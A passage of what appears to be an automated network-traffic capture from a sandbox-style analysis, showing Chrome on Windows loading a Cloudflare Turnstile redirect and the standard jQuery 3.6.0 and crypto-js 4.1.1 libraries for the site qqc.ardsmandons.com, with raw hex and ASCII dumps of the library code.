                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://qqc.ardsmandons.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:28 UTC386INHTTP/1.1 302 Found
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:28 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          location: /turnstile/v0/g/e4025c85ea63/api.js
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfb4ec520f39-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449746151.101.194.1374434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:28 UTC625OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                          Host: code.jquery.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://qqc.ardsmandons.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:28 UTC611INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 89501
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 2531423
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:28 GMT
                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890084-NYC
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          X-Cache-Hits: 55, 0
                                                                                                                          X-Timer: S1732549349.631235,VS0,VE1
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                          2024-11-25 15:42:28 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449747104.17.24.144434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:28 UTC653OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://qqc.ardsmandons.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:28 UTC961INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:28 GMT
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                          ETag: W/"61182885-40eb"
                                                                                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 1380618
                                                                                                                          Expires: Sat, 15 Nov 2025 15:42:28 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTocISEK2U5YSXcWPM9xQzkUdWtOD7FX%2FAivzslsuqdI1Bg0CjyNRij3%2BLSk2jpUKZ4H9lGgqsrQBKmNpZS7oJ1eDU0q0FNa8AvBZZ%2FdVwTGkLOXc8%2BfIIMN8OFmiA2rFwxhLojF"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfb55c06727a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:28 UTC408INData Raw: 37 62 65 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                          Data Ascii: 7be8!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                          2024-11-25 15:42:28 UTC1369INData Raw: 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63
                                                                                                                          Data Ascii: eof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.c
                                                                                                                          2024-11-25 15:42:28 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74
                                                                                                                          Data Ascii: e.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByt
                                                                                                                          2024-11-25 15:42:28 UTC1369INData Raw: 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61
                                                                                                                          Data Ascii: typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a
                                                                                                                          2024-11-25 15:42:28 UTC1369INData Raw: 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e
